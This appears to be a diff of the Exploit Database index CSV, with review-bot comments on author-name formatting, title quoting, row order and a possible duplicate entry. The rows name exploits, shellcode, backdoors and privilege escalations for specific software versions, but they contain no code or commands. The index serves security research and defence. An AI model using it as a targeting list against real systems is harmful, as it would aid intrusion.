40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
@ -20501,7 +20502,7 @@ id,file,description,date,author,platform,type,port
23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0
23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injections",2003-10-20,"Aviram Jenik",php,webapps,0
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr`Ponidi,cgi,webapps,0
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr_Ponidi,cgi,webapps,0
23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,java,webapps,0
23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps,0
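
Review bot: Row 23266 renames the author from Dr`Ponidi to Dr_Ponidi, but a backtick has no special meaning in CSV and the field was not quoted before or after, so the edit alters the credited handle without changing how the row parses. If a downstream script breaks on the backtick, name it in the commit message and handle the character there rather than rewriting the data.
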
@ -21759,7 +21760,7 @@ id,file,description,date,author,platform,type,port
24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0
24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0
24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0
24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. _Alex_ Hankins",linux,dos,0
24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0
24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0
24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0
@ -22932,7 +22933,7 @@ id,file,description,date,author,platform,type,port
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80
25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0
25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0
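
Review bot: Row 33425 normalises the author to "Gregory Draperi" but leaves the description as "SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation", where the first " - " sits inside the product name instead of separating product from issue as in the neighbouring rows. Drop that first separator in the same change so the title follows the "Product version - Issue" pattern.
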
@ -23326,7 +23327,7 @@ id,file,description,date,author,platform,type,port
26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0
26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0
26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps,0
26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,Metasploit,windows,remote,0
26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - ModCP.php SQL Injection",2005-08-20,[R],php,webapps,0
26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 - links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
@ -23459,7 +23460,7 @@ id,file,description,date,author,platform,type,port
26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh, Mormoroth",php,webapps,0
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - f p Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local,0
@ -24058,6 +24059,7 @@ id,file,description,date,author,platform,type,port
26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - cat.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - links.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0
40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - pmprojects.asp projectid Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
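Review bot: Row 40385 is inserted between 26933 and 26934, in the middle of the ProjectApp 3.3 run, which puts a 2016-09-15 NetBSD local entry inside a block of 2005 ASP/CGI web entries. If the file's row order is meaningful, say what key it follows; if it is not, adding new ids at the end keeps future diffs easier to read and avoids splitting related rows.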
@ -24111,6 +24113,7 @@ id,file,description,date,author,platform,type,port
26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0
26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0
26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
40384,platforms/java/webapps/40384.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-15,"Gregory Draperi",java,webapps,0
26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
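Review bot: New row 40384 carries the same description, "Apache Mina 2.0.13 - Remote Command Execution", and the same author as row 40382 in the next hunk, differing only in date (2016-09-15 vs 2016-09-14) and classification (java/webapps vs multiple/remote). Confirm that these are two distinct submissions; if they are, distinguish the titles so a search on the description does not return two indistinguishable entries, and if they are not, drop one.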
@ -24999,7 +25002,7 @@ id,file,description,date,author,platform,type,port
27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0
27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - events.tar source_ip Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory DRAPERI",multiple,remote,0
40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",multiple,remote,0
27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection",2006-05-18,l0om,cgi,webapps,0
27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - default.asp action Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0
@ -26767,7 +26770,7 @@ id,file,description,date,author,platform,type,port
29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0
29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez_ Eduardo Arriols",linux,remote,0
29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",windows,dos,0
29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80
30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
@ -31927,7 +31930,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit _ Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0
@ -32041,8 +32044,8 @@ id,file,description,date,author,platform,type,port
35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0
35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
35558,platforms/php/webapps/35558.txt,"PHP-Fusion - 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0
35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555
@ -32268,7 +32271,7 @@ id,file,description,date,author,platform,type,port
35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80
35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0
35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan_ Koh",hardware,webapps,623
35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
@ -33779,9 +33782,9 @@ id,file,description,date,author,platform,type,port
37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0
37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
@ -34000,7 +34003,7 @@ id,file,description,date,author,platform,type,port
37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor / Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0
37629,platforms/php/webapps/37629.txt,"WordPress Plugin BuddyPress Activity Plus 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80
37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0
@ -34805,7 +34808,7 @@ id,file,description,date,author,platform,type,port
38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
38484,platforms/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0
38485,platforms/windows/dos/38485.py,"VideoLAN VLC Media Player 2.2.1 - libvlccore '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0
38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
38489,platforms/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload",2015-10-19,Metasploit,php,remote,0
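Review bot: In row 38486 the rewritten author string "yokoacc_ nudragn_ rungga_reksya" mixes separator underscores with the underscore that is part of the handle rungga_reksya, so the list can only be split back into names by relying on the trailing space. Pick a separator that cannot occur inside a handle, or keep the quoted commas.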
@ -34970,7 +34973,7 @@ id,file,description,date,author,platform,type,port
39374,platforms/osx/dos/39374.c,"Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,windows,dos,0
38660,platforms/php/remote/38660.rb,"WordPress Plugin Ajax Load More 2.8.1.1 - PHP Upload",2015-11-09,Metasploit,php,remote,0
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan_ Balagopal N",php,webapps,0
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0
38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0
38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0
@ -36293,7 +36296,7 @@ id,file,description,date,author,platform,type,port
40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",cgi,webapps,80
40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
@ -36396,7 +36399,7 @@ id,file,description,date,author,platform,type,port
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
40206,platforms/php/webapps/40206.txt,"WordPress Plugin Count per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
@ -36408,7 +36411,7 @@ id,file,description,date,author,platform,type,port
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
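Review bot: Row 40215 switches from (strong_user.php) to 'strong_user.php', but row 40218 two lines below still reads "PHPCollab CMS 2.5 - (emailusers.php) SQL Injection". Apply the same quoting to 40218 in this change so the title convention does not differ between adjacent rows.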
@ -36452,7 +36455,7 @@ id,file,description,date,author,platform,type,port
40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Shadow Brokers",hardware,remote,161
